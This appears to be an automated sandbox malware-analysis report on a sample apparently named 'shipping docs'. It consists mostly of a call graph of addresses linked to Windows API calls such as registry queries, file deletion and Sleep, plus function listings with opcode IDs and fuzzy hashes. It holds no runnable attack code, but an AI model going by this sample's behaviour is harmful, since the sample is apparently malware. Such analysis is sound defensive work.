50456 61fa532 50456->50228 50457->50456 50458->50456 50459->50456 50460->50456 50462 61fa372 50461->50462 50464 66f6c78 3 API calls 50462->50464 50465 66f6b36 3 API calls 50462->50465 50466 66f6f64 3 API calls 50462->50466 50467 66f6f10 3 API calls 50462->50467 50463 61fa532 50463->50228 50464->50463 50465->50463 50466->50463 50467->50463 50469 61f9e77 50468->50469 50482 684da38 LdrInitializeThunk 50469->50482 50470 61fa01c KiUserExceptionDispatcher 50472 61fa0bf 50470->50472 50476 684e9d8 2 API calls 50472->50476 50473 61fa0eb 50477 684f240 2 API calls 50473->50477 50474 61fa130 50478 66f6c78 3 API calls 50474->50478 50479 66f6b36 3 API calls 50474->50479 50480 66f6f64 3 API calls 50474->50480 50481 66f6f10 3 API calls 50474->50481 50475 61fa532 50475->50228 50476->50473 50477->50474 50478->50475 50479->50475 50480->50475 50481->50475 50482->50470 50484 61f9f01 50483->50484 50495 684da38 LdrInitializeThunk 50484->50495 50485 61fa01c KiUserExceptionDispatcher 50487 61fa0bf 50485->50487 50496 684e9d8 2 API calls 50487->50496 50488 61fa0eb 50497 684f240 2 API calls 50488->50497 50489 61fa130 50491 66f6c78 3 API calls 50489->50491 50492 66f6b36 3 API calls 50489->50492 50493 66f6f64 3 API calls 50489->50493 50494 66f6f10 3 API calls 50489->50494 50490 61fa532 50490->50228 50491->50490 50492->50490 50493->50490 50494->50490 50495->50485 50496->50488 50497->50489 50499 61f9f82 50498->50499 50506 684da38 LdrInitializeThunk 50499->50506 50500 61fa01c KiUserExceptionDispatcher 50502 61fa0bf 50500->50502 50507 684e9d8 2 API calls 50502->50507 50503 61fa0eb 50508 684f240 2 API calls 50503->50508 50504 61fa130 50509 66f6c78 3 API calls 50504->50509 50510 66f6b36 3 API calls 50504->50510 50511 66f6f64 3 API calls 50504->50511 50512 66f6f10 3 API calls 50504->50512 50505 61fa532 50505->50228 50506->50500 50507->50503 50508->50504 50509->50505 50510->50505 50511->50505 50512->50505 50514 61fa402 50513->50514 50516 66f6c78 3 API calls 50514->50516 50517 66f6b36 3 API calls 50514->50517 50518 66f6f64 3 API calls 50514->50518 50519 66f6f10 3 API calls 50514->50519 50515 61fa532 50515->50228 50516->50515 50517->50515 50518->50515 50519->50515 50521 61fa486 50520->50521 50523 66f6c78 3 API calls 50521->50523 50524 66f6b36 3 API calls 50521->50524 50525 66f6f64 3 API calls 50521->50525 50526 66f6f10 3 API calls 50521->50526 50522 61fa532 50522->50228 50523->50522 50524->50522 50525->50522 50526->50522 50528 61f9c87 50527->50528 50529 61f9d24 KiUserExceptionDispatcher 50528->50529 50530 61f9d40 50529->50530 50541 684da38 LdrInitializeThunk 50530->50541 50531 61fa01c KiUserExceptionDispatcher 50533 61fa0bf 50531->50533 50542 684e9d8 2 API calls 50533->50542 50534 61fa0eb 50543 684f240 2 API calls 50534->50543 50535 61fa130 50537 66f6c78 3 API calls 50535->50537 50538 66f6b36 3 API calls 50535->50538 50539 66f6f64 3 API calls 50535->50539 50540 66f6f10 3 API calls 50535->50540 50536 61fa532 50536->50228 50537->50536 50538->50536 50539->50536 50540->50536 50541->50531 50542->50534 50543->50535 50545 61fa00c 50544->50545 50556 684da38 LdrInitializeThunk 50545->50556 50546 61fa01c KiUserExceptionDispatcher 50548 61fa0bf 50546->50548 50557 684e9d8 2 API calls 50548->50557 50549 61fa0eb 50558 684f240 2 API calls 50549->50558 50550 61fa130 50552 66f6c78 3 API calls 50550->50552 50553 66f6b36 3 API calls 50550->50553 50554 66f6f64 3 API calls 50550->50554 50555 66f6f10 3 API calls 50550->50555 50551 61fa532 50551->50228 50552->50551 50553->50551 50554->50551 50555->50551 50556->50546 50557->50549 50558->50550 50560 61fa08d KiUserExceptionDispatcher 50559->50560 50562 61fa0bf 50560->50562 50566 684e9d8 2 API calls 50562->50566 50563 61fa0eb 50567 684f240 2 API calls 50563->50567 50564 61fa130 50568 66f6c78 3 API calls 50564->50568 50569 66f6b36 3 API calls 50564->50569 50570 66f6f64 3 API calls 50564->50570 50571 66f6f10 3 API calls 50564->50571 50565 61fa532 50565->50228 50566->50563 50567->50564 50568->50565 50569->50565 50570->50565 50571->50565 50573 61fa0d2 50572->50573 50577 684e9d8 2 API calls 50573->50577 50574 61fa0eb 50578 684f240 2 API calls 50574->50578 50575 61fa130 50579 66f6c78 3 API calls 50575->50579 50580 66f6b36 3 API calls 50575->50580 50581 66f6f64 3 API calls 50575->50581 50582 66f6f10 3 API calls 50575->50582 50576 61fa532 50576->50228 50577->50574 50578->50575 50579->50576 50580->50576 50581->50576 50582->50576 50584 61f92d8 50583->50584 50936 61fb5c1 50584->50936 50943 61fc2a0 50584->50943 50585 61f9b67 50589 61fa15c 50588->50589 50591 66f6c78 3 API calls 50589->50591 50592 66f6b36 3 API calls 50589->50592 50593 66f6f64 3 API calls 50589->50593 50594 66f6f10 3 API calls 50589->50594 50590 61fa532 50590->50228 50591->50590 50592->50590 50593->50590 50594->50590 50596 61fa1e6 50595->50596 50598 66f6c78 3 API calls 50596->50598 50599 66f6b36 3 API calls 50596->50599 50600 66f6f64 3 API calls 50596->50600 50601 66f6f10 3 API calls 50596->50601 50597 61fa532 50597->50228 50598->50597 50599->50597 50600->50597 50601->50597 50603 61fa267 50602->50603 50605 66f6c78 3 API calls 50603->50605 50606 66f6b36 3 API calls 50603->50606 50607 66f6f64 3 API calls 50603->50607 50608 66f6f10 3 API calls 50603->50608 50604 61fa532 50604->50228 50605->50604 50606->50604 50607->50604 50608->50604 50610 61f92fd 50609->50610 50612 61fb5c1 3 API calls 50610->50612 50613 61fc2a0 3 API calls 50610->50613 50611 61f9b67 50612->50611 50613->50611 50615 61f9d6c 50614->50615 50622 684da38 LdrInitializeThunk 50615->50622 50616 61fa01c KiUserExceptionDispatcher 50618 61fa0bf 50616->50618 50623 684e9d8 2 API calls 50618->50623 50619 61fa0eb 50624 684f240 2 API calls 50619->50624 50620 61fa130 50625 66f6c78 3 API calls 50620->50625 50626 66f6b36 3 API calls 50620->50626 50627 66f6f64 3 API calls 50620->50627 50628 66f6f10 3 API calls 50620->50628 50621 61fa532 50621->50228 50622->50616 50623->50619 50624->50620 50625->50621 50626->50621 50627->50621 50628->50621 50630 61f9ded 50629->50630 50637 684da38 LdrInitializeThunk 50630->50637 50631 61fa01c KiUserExceptionDispatcher 50633 61fa0bf 50631->50633 50638 684e9d8 2 API calls 50633->50638 50634 61fa0eb 50639 684f240 2 API calls 50634->50639 50635 61fa130 50640 66f6c78 3 API calls 50635->50640 50641 66f6b36 3 API calls 50635->50641 50642 66f6f64 3 API calls 50635->50642 50643 66f6f10 3 API calls 50635->50643 50636 61fa532 50636->50228 50637->50631 50638->50634 50639->50635 50640->50636 50641->50636 50642->50636 50643->50636 50645 61f9db1 50644->50645 50652 684da38 LdrInitializeThunk 50645->50652 50646 61fa01c KiUserExceptionDispatcher 50648 61fa0bf 50646->50648 50653 684e9d8 2 API calls 50648->50653 50649 61fa0eb 50654 684f240 2 API calls 50649->50654 50650 61fa130 50655 66f6c78 3 API calls 50650->50655 50656 66f6b36 3 API calls 50650->50656 50657 66f6f64 3 API calls 50650->50657 50658 66f6f10 3 API calls 50650->50658 50651 61fa532 50651->50228 50652->50646 50653->50649 50654->50650 50655->50651 50656->50651 50657->50651 50658->50651 50660 61f9e32 50659->50660 50672 684da38 LdrInitializeThunk 50660->50672 50661 61fa01c KiUserExceptionDispatcher 50663 61fa0bf 50661->50663 50673 684e9d8 2 API calls 50663->50673 50664 61fa0eb 50667 684f240 2 API calls 50664->50667 50665 61fa130 50668 66f6c78 3 API calls 50665->50668 50669 66f6b36 3 API calls 50665->50669 50670 66f6f64 3 API calls 50665->50670 50671 66f6f10 3 API calls 50665->50671 50666 61fa532 50666->50228 50667->50665 50668->50666 50669->50666 50670->50666 50671->50666 50672->50661 50673->50664 50675 61fa3ba 50674->50675 50677 66f6c78 3 API calls 50675->50677 50678 66f6b36 3 API calls 50675->50678 50679 66f6f64 3 API calls 50675->50679 50680 66f6f10 3 API calls 50675->50680 50676 61fa532 50676->50228 50677->50676 50678->50676 50679->50676 50680->50676 50682 61f9ebc 50681->50682 50695 684da38 LdrInitializeThunk 50682->50695 50683 61fa01c KiUserExceptionDispatcher 50685 61fa0bf 50683->50685 50689 684e9d8 2 API calls 50685->50689 50686 61fa0eb 50690 684f240 2 API calls 50686->50690 50687 61fa130 50691 66f6c78 3 API calls 50687->50691 50692 66f6b36 3 API calls 50687->50692 50693 66f6f64 3 API calls 50687->50693 50694 66f6f10 3 API calls 50687->50694 50688 61fa532 50688->50228 50689->50686 50690->50687 50691->50688 50692->50688 50693->50688 50694->50688 50695->50683 50697 61fa43e 50696->50697 50699 66f6c78 3 API calls 50697->50699 50700 66f6b36 3 API calls 50697->50700 50701 66f6f64 3 API calls 50697->50701 50702 66f6f10 3 API calls 50697->50702 50698 61fa532 50698->50228 50699->50698 50700->50698 50701->50698 50702->50698 50704 61f9c42 50703->50704 50705 61f9d24 KiUserExceptionDispatcher 50704->50705 50706 61f9d40 50705->50706 50717 684da38 LdrInitializeThunk 50706->50717 50707 61fa01c KiUserExceptionDispatcher 50709 61fa0bf 50707->50709 50718 684e9d8 2 API calls 50709->50718 50710 61fa0eb 50719 684f240 2 API calls 50710->50719 50711 61fa130 50713 66f6c78 3 API calls 50711->50713 50714 66f6b36 3 API calls 50711->50714 50715 66f6f64 3 API calls 50711->50715 50716 66f6f10 3 API calls 50711->50716 50712 61fa532 50712->50228 50713->50712 50714->50712 50715->50712 50716->50712 50717->50707 50718->50710 50719->50711 50721 61f9f46 50720->50721 50728 684da38 LdrInitializeThunk 50721->50728 50722 61fa01c KiUserExceptionDispatcher 50724 61fa0bf 50722->50724 50729 684e9d8 2 API calls 50724->50729 50725 61fa0eb 50730 684f240 2 API calls 50725->50730 50726 61fa130 50731 66f6c78 3 API calls 50726->50731 50732 66f6b36 3 API calls 50726->50732 50733 66f6f64 3 API calls 50726->50733 50734 66f6f10 3 API calls 50726->50734 50727 61fa532 50727->50228 50728->50722 50729->50725 50730->50726 50731->50727 50732->50727 50733->50727 50734->50727 50736 684da59 50735->50736 50737 61fa01c KiUserExceptionDispatcher 50736->50737 50738 684e6d7 LdrInitializeThunk 50736->50738 50737->50328 50739 684e6f3 50738->50739 50741 684e9fb 50740->50741 50778 684ed28 50741->50778 50742 61fa0eb 50744 684f240 50742->50744 50745 684f265 50744->50745 50747 684ee98 RegQueryValueExW 50745->50747 50748 684f281 50745->50748 50782 684ee8c 50745->50782 50747->50745 50748->50330 50750 66f6c96 50749->50750 50751 66f6f79 50750->50751 50786 66f6fbd 50750->50786 50791 66f7010 50750->50791 50795 66fa098 50750->50795 50802 66fa090 50750->50802 50751->50751 50758 66f6db8 50756->50758 50757 66f6f79 50758->50757 50759 66fa098 3 API calls 50758->50759 50760 66fa090 3 API calls 50758->50760 50761 66f6fbd 3 API calls 50758->50761 50762 66f7010 3 API calls 50758->50762 50759->50758 50760->50758 50761->50758 50762->50758 50765 66f6db8 50763->50765 50764 66f6f79 50765->50763 50765->50764 50766 66fa098 3 API calls 50765->50766 50767 66fa090 3 API calls 50765->50767 50768 66f6fbd 3 API calls 50765->50768 50769 66f7010 3 API calls 50765->50769 50766->50765 50767->50765 50768->50765 50769->50765 50771 66f6b49 50770->50771 50773 66f6b6c 50770->50773 50771->50331 50772 66f6b99 50772->50331 50773->50772 50774 66fa098 3 API calls 50773->50774 50775 66fa090 3 API calls 50773->50775 50776 66f6fbd 3 API calls 50773->50776 50777 66f7010 3 API calls 50773->50777 50774->50773 50775->50773 50776->50773 50777->50773 50779 684edfc 50778->50779 50780 684ed47 50778->50780 50779->50780 50781 684f240 2 API calls 50779->50781 50780->50742 50781->50780 50783 684f7c0 RegOpenKeyExW 50782->50783 50785 684f886 50783->50785 50785->50785 50787 66f6fd1 50786->50787 50788 66f6ff4 50786->50788 50787->50750 50789 66f7888 50788->50789 50809 61ff302 50788->50809 50789->50750 50792 66f7033 50791->50792 50793 66f7888 50792->50793 50794 61ff302 3 API calls 50792->50794 50793->50750 50794->50792 50796 66fa0c6 50795->50796 50797 66fa224 50796->50797 50857 66fa8b8 50796->50857 50873 66fa9aa 50796->50873 50889 66fa85f 50796->50889 50906 66fa870 50796->50906 50797->50750 50804 66fa098 50802->50804 50803 66fa224 50803->50750 50804->50803 50805 66fa85f 3 API calls 50804->50805 50806 66fa9aa 3 API calls 50804->50806 50807 66fa8b8 3 API calls 50804->50807 50808 66fa870 3 API calls 50804->50808 50805->50803 50806->50803 50807->50803 50808->50803 50810 61ff320 50809->50810 50811 61ff392 50810->50811 50814 61ff418 50810->50814 50818 61ff412 50810->50818 50811->50788 50815 61ff42b 50814->50815 50822 61ff4a2 50815->50822 50816 61ff48b 50816->50811 50819 61ff42b 50818->50819 50821 61ff4a2 3 API calls 50819->50821 50820 61ff48b 50820->50811 50821->50820 50823 61ff4cc 50822->50823 50831 61ff4e0 50822->50831 50823->50831 50834 61f75f0 50823->50834 50825 61ff52f 50826 61ff539 50825->50826 50827 61ff553 50825->50827 50828 61f75f0 3 API calls 50826->50828 50826->50831 50840 61f7e40 50827->50840 50828->50831 50831->50816 50835 61f7600 50834->50835 50836 61f7624 50835->50836 50837 61f72f8 DeleteFileW DeleteFileW DeleteFileW 50835->50837 50838 61f72e8 DeleteFileW DeleteFileW DeleteFileW 50835->50838 50839 61f75f0 DeleteFileW DeleteFileW DeleteFileW 50835->50839 50836->50825 50837->50836 50838->50836 50839->50836 50842 61f7e7c 50840->50842 50843 61f7f57 50840->50843 50841 61f7e9f 50841->50831 50847 6840b9b 50841->50847 50852 6840bae 50841->50852 50842->50841 50842->50843 50845 61f84bf DeleteFileW DeleteFileW DeleteFileW 50842->50845 50846 61f8518 DeleteFileW DeleteFileW DeleteFileW 50842->50846 50843->50841 50844 61f6324 DeleteFileW 50843->50844 50844->50841 50845->50843 50846->50843 50848 6840baf 50847->50848 50849 6840ba1 50847->50849 50848->50849 50850 66f6fbd DeleteFileW DeleteFileW DeleteFileW 50848->50850 50851 66f7010 DeleteFileW DeleteFileW DeleteFileW 50848->50851 50849->50831 50850->50849 50851->50849 50853 6840baf 50852->50853 50854 6840bb5 50853->50854 50855 66f6fbd DeleteFileW DeleteFileW DeleteFileW 50853->50855 50856 66f7010 DeleteFileW DeleteFileW DeleteFileW 50853->50856 50854->50831 50855->50854 50856->50854 50858 66fa8d1 50857->50858 50859 66fa992 50858->50859 50860 66fac91 50858->50860 50868 66fa85f 3 API calls 50858->50868 50869 66fa9aa 3 API calls 50858->50869 50870 66fa8b8 3 API calls 50858->50870 50871 66fa870 3 API calls 50858->50871 50859->50797 50861 66facb9 50860->50861 50862 61ff302 3 API calls 50860->50862 50864 66fa85f 3 API calls 50860->50864 50865 66fa9aa 3 API calls 50860->50865 50866 66fa8b8 3 API calls 50860->50866 50867 66fa870 3 API calls 50860->50867 50872 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50860->50872 50923 66fc0a9 50860->50923 50861->50797 50862->50860 50864->50860 50865->50860 50866->50860 50867->50860 50868->50858 50869->50858 50870->50858 50871->50858 50872->50860 50877 66fa9d8 50873->50877 50874 66faa2b 50874->50797 50875 66fac91 50876 66facb9 50875->50876 50878 66fc0a9 3 API calls 50875->50878 50879 66fa85f 3 API calls 50875->50879 50880 66fa9aa 3 API calls 50875->50880 50881 66fa8b8 3 API calls 50875->50881 50882 66fa870 3 API calls 50875->50882 50887 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50875->50887 50888 61ff302 3 API calls 50875->50888 50876->50797 50877->50874 50877->50875 50883 66fa85f 3 API calls 50877->50883 50884 66fa9aa 3 API calls 50877->50884 50885 66fa8b8 3 API calls 50877->50885 50886 66fa870 3 API calls 50877->50886 50878->50875 50879->50875 50880->50875 50881->50875 50882->50875 50883->50877 50884->50877 50885->50877 50886->50877 50887->50875 50888->50875 50890 66fa87e 50889->50890 50892 66fa8a1 50889->50892 50890->50797 50891 66facb9 50891->50797 50893 66fac91 50892->50893 50894 66fa992 50892->50894 50902 66fa85f 3 API calls 50892->50902 50903 66fa9aa 3 API calls 50892->50903 50904 66fa8b8 3 API calls 50892->50904 50905 66fa870 3 API calls 50892->50905 50893->50891 50895 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50893->50895 50896 61ff302 3 API calls 50893->50896 50897 66fc0a9 3 API calls 50893->50897 50898 66fa85f 3 API calls 50893->50898 50899 66fa9aa 3 API calls 50893->50899 50900 66fa8b8 3 API calls 50893->50900 50901 66fa870 3 API calls 50893->50901 50894->50797 50895->50893 50896->50893 50897->50893 50898->50893 50899->50893 50900->50893 50901->50893 50902->50892 50903->50892 50904->50892 50905->50892 50907 66fa87e 50906->50907 50908 66fa8a1 50906->50908 50907->50797 50909 66fa992 50908->50909 50910 66fac91 50908->50910 50919 66fa85f 3 API calls 50908->50919 50920 66fa9aa 3 API calls 50908->50920 50921 66fa8b8 3 API calls 50908->50921 50922 66fa870 3 API calls 50908->50922 50909->50797 50911 66facb9 50910->50911 50912 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50910->50912 50913 61ff302 3 API calls 50910->50913 50914 66fc0a9 3 API calls 50910->50914 50915 66fa85f 3 API calls 50910->50915 50916 66fa9aa 3 API calls 50910->50916 50917 66fa8b8 3 API calls 50910->50917 50918 66fa870 3 API calls 50910->50918 50911->50797 50912->50910 50913->50910 50914->50910 50915->50910 50916->50910 50917->50910 50918->50910 50919->50908 50920->50908 50921->50908 50922->50908 50924 66fc0b3 50923->50924 50925 66fc0da 50924->50925 50927 66fcbc8 50924->50927 50925->50860 50929 66fcbcb 50927->50929 50930 66fcc2a 50927->50930 50928 66fcc36 50928->50925 50929->50925 50930->50928 50932 66fcc94 50930->50932 50935 66fcc28 DeleteFileW DeleteFileW DeleteFileW 50930->50935 50932->50925 50933 66fa870 3 API calls 50932->50933 50934 66fcd56 50933->50934 50934->50925 50935->50932 50937 61fb5e1 50936->50937 50938 61fb604 50936->50938 50937->50585 50939 61fb631 50938->50939 50940 61fb5c1 3 API calls 50938->50940 50941 61fc2a0 3 API calls 50938->50941 50942 61ff302 3 API calls 50938->50942 50939->50585 50940->50938 50941->50938 50942->50938 50944 61fc2c5 50943->50944 50945 61fc6cc 50944->50945 50946 61fb5c1 3 API calls 50944->50946 50947 61fc2a0 3 API calls 50944->50947 50948 61ff302 3 API calls 50944->50948 50945->50585 50946->50944 50947->50944 50948->50944 50952 61f7e37 50949->50952 50950 61f7f57 50953 61f7e9f 50950->50953 50979 61f6324 50950->50979 50952->50950 50952->50953 50960 61f84bf 50952->50960 50970 61f8518 50952->50970 50953->50307 50958 61f848b 50956->50958 50957 61f84a5 50957->50307 50958->50957 50959 61f6324 DeleteFileW 50958->50959 50959->50957 50961 61f84de 50960->50961 50962 61f84c3 50960->50962 50961->50950 50962->50961 50963 61f85c7 50962->50963 50965 61f8587 50962->50965 50964 61f85a7 50963->50964 50968 6840bae 2 API calls 50963->50968 50969 6840b9b 2 API calls 50963->50969 50964->50950 50965->50964 50966 61f86ba DeleteFileW 50965->50966 50967 61f86e7 50966->50967 50967->50950 50968->50964 50969->50964 50978 61f8556 50970->50978 50971 61f85c7 50972 61f85a7 50971->50972 50976 6840bae 2 API calls 50971->50976 50977 6840b9b 2 API calls 50971->50977 50972->50950 50973 61f86ba DeleteFileW 50975 61f86e7 50973->50975 50974 61f8587 50974->50972 50974->50973 50975->50950 50976->50972 50977->50972 50978->50971 50978->50974 50981 61f8668 DeleteFileW 50979->50981 50982 61f86e7 50981->50982 50982->50953 50984 2df2c1b 50983->50984 50989 2df30b4 50984->50989 50995 2df30c0 50984->50995 51001 2df30d0 50984->51001 50985 2df2c28 50985->50221 50990 2df30c0 50989->50990 51007 2df38b0 50990->51007 50991 2df31c5 50992 2df3142 50992->50991 50993 2df38b0 3 API calls 50992->50993 50993->50992 50996 2df30ca 50995->50996 51000 2df38b0 3 API calls 50996->51000 50997 2df31c5 50998 2df3142 50998->50997 50999 2df38b0 3 API calls 50998->50999 50999->50998 51000->50998 51002 2df30eb 51001->51002 51006 2df38b0 3 API calls 51002->51006 51003 2df31c5 51004 2df3142 51004->51003 51005 2df38b0 3 API calls 51004->51005 51005->51004 51006->51004 51008 2df38a5 51007->51008 51008->51007 51009 2df3972 51008->51009 51012 61f72f8 51008->51012 51029 61f72e8 51008->51029 51009->50992 51013 61f7311 51012->51013 51019 61f72f8 3 API calls 51013->51019 51020 61f72e8 3 API calls 51013->51020 51021 61f75f0 3 API calls 51013->51021 51014 61f734d 51017 61f7369 51014->51017 51024 61f7e1a 3 API calls 51014->51024 51025 61f7e40 3 API calls 51014->51025 51015 61f7401 51016 61f740a 51015->51016 51015->51017 51018 61f7376 51016->51018 51022 6840bae 3 API calls 51016->51022 51023 6840b9b 3 API calls 51016->51023 51017->51018 51026 61f72f8 3 API calls 51017->51026 51027 61f72e8 3 API calls 51017->51027 51028 61f75f0 3 API calls 51017->51028 51018->51009 51019->51014 51020->51014 51021->51014 51022->51018 51023->51018 51024->51015 51025->51015 51026->51018 51027->51018 51028->51018 51030 61f7311 51029->51030 51038 61f72f8 3 API calls 51030->51038 51039 61f72e8 3 API calls 51030->51039 51040 61f75f0 3 API calls 51030->51040 51031 61f7369 51033 61f7376 51031->51033 51043 61f72f8 3 API calls 51031->51043 51044 61f72e8 3 API calls 51031->51044 51045 61f75f0 3 API calls 51031->51045 51032 61f734d 51032->51031 51036 61f7e1a 3 API calls 51032->51036 51037 61f7e40 3 API calls 51032->51037 51033->51009 51034 61f7401 51034->51031 51035 61f740a 51034->51035 51035->51033 51041 6840bae 3 API calls 51035->51041 51042 6840b9b 3 API calls 51035->51042 51036->51034 51037->51034 51038->51032 51039->51032 51040->51032 51041->51033 51042->51033 51043->51033 51044->51033 51045->51033 51046 61f6cc8 51047 61f6ce8 51046->51047 51048 61f6cf0 51046->51048 51050 61f6de4 51048->51050 51051 2df38b0 3 API calls 51048->51051 51049 61f6d94 51049->51050 51052 2df38b0 3 API calls 51049->51052 51051->51049 51052->51050 51053 6849718 51054 6849737 LdrInitializeThunk 51053->51054 51056 684978a 51054->51056 50179 66ff920 GetCurrentProcess 50180 66ff99a GetCurrentThread 50179->50180 50183 66ff993 50179->50183 50181 66ff9d7 GetCurrentProcess 50180->50181 50182 66ff9d0 50180->50182 50186 66ffa0d 50181->50186 50182->50181 50183->50180 50184 66ffa35 GetCurrentThreadId 50185 66ffa66 50184->50185 50186->50184 50187 2df0b50 50188 2df0b91 Sleep 50187->50188 50189 2df0bbe 50188->50189 51057 2df4c20 51058 2df4c34 51057->51058 51061 2df5272 51058->51061 51059 2df4c3d 51062 2df527b 51061->51062 51067 2df546e 51061->51067 51071 2df5454 51061->51071 51075 2df5347 51061->51075 51079 2df5358 51061->51079 51062->51059 51068 2df5481 51067->51068 51069 2df5493 51067->51069 51083 2df5750 51068->51083 51072 2df5407 51071->51072 51073 2df5493 51072->51073 51074 2df5750 2 API calls 51072->51074 51074->51073 51076 2df5358 51075->51076 51077 2df5493 51076->51077 51078 2df5750 2 API calls 51076->51078 51078->51077 51080 2df539c 51079->51080 51081 2df5493 51080->51081 51082 2df5750 2 API calls 51080->51082 51082->51081 51084 2df576e 51083->51084 51088 2df579f 51084->51088 51092 2df57b0 51084->51092 51085 2df577e 51085->51069 51089 2df57b0 51088->51089 51090 2df5814 RtlEncodePointer 51089->51090 51091 2df583d 51089->51091 51090->51091 51091->51085 51093 2df57ea 51092->51093 51094 2df5814 RtlEncodePointer 51093->51094 51095 2df583d 51093->51095 51094->51095 51095->51085

                                                                                              Executed Functions

                                                                                              Function 0684DA38 Relevance: 2.6, APIs: 1, Instructions: 1135COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a078ac258af679c399f6afd9fd6f9377782226a9ac8a33d52af3721601ee982
                                                                                              • Instruction ID: 41a557cf1fd7f333c595ce3e6aff5f87d2f0e0367e8be8a4ad183957c3d7fde0
                                                                                              • Opcode Fuzzy Hash: 4a078ac258af679c399f6afd9fd6f9377782226a9ac8a33d52af3721601ee982
                                                                                              • Instruction Fuzzy Hash: AC928930F002188FDB94ABB4D8586AEBBF6AF88308F158569D505DB391EB74DC45CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 066FF910 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 066FF980
                                                                                              • GetCurrentThread.KERNEL32 ref: 066FF9BD
                                                                                              • GetCurrentProcess.KERNEL32 ref: 066FF9FA
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 066FFA53
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: b55524448d6834dfb54f83b6934c7058cce3f824937d77ede84df952ddf51d28
                                                                                              • Instruction ID: 6c492f23b5d7a8c60e1b7d06f7fa6e6d1e99096d24096795f50152ac1c3cc326
                                                                                              • Opcode Fuzzy Hash: b55524448d6834dfb54f83b6934c7058cce3f824937d77ede84df952ddf51d28
                                                                                              • Instruction Fuzzy Hash: 1D5177B09006498FCB50CFA9D948BEEBBF1FF48314F14805AE548A7350C7345984CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 066FF920 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 066FF980
                                                                                              • GetCurrentThread.KERNEL32 ref: 066FF9BD
                                                                                              • GetCurrentProcess.KERNEL32 ref: 066FF9FA
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 066FFA53
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 06a0713847183a9961508dee3197c018ea13eb7668ae69e54276cbc85920ef4a
                                                                                              • Instruction ID: 0b209eb5240ade52d31226a76b9a592bff46c5be0821b313a81061cea796beb2
                                                                                              • Opcode Fuzzy Hash: 06a0713847183a9961508dee3197c018ea13eb7668ae69e54276cbc85920ef4a
                                                                                              • Instruction Fuzzy Hash: 015155B09006498FDB50CFA9D988BAEBBF1FF48314F24806AE519A7350C7749884CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9C10 Relevance: 3.4, APIs: 2, Instructions: 361COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: a2b9b66aec84f921cda3afe067c3e9d7bd8a96c9f34f123564a401ba29ca41b4
                                                                                              • Instruction ID: 26be1a4e5a1e598e123e760d14a10f3287f19de8af33f5b8cbf4ba97f24b7e52
                                                                                              • Opcode Fuzzy Hash: a2b9b66aec84f921cda3afe067c3e9d7bd8a96c9f34f123564a401ba29ca41b4
                                                                                              • Instruction Fuzzy Hash: BF12D834902259CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 061F9C31 Relevance: 3.4, APIs: 2, Instructions: 361COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: cd6917b0ca146c67969f9fa9de1d7c7e46c3c5bdc69ae885712671f2c614bb91
                                                                                              • Instruction ID: 34afd92ffe3dfcd7967503daf963d1aefc41c66542b5aa4d734b179b9c2056d6
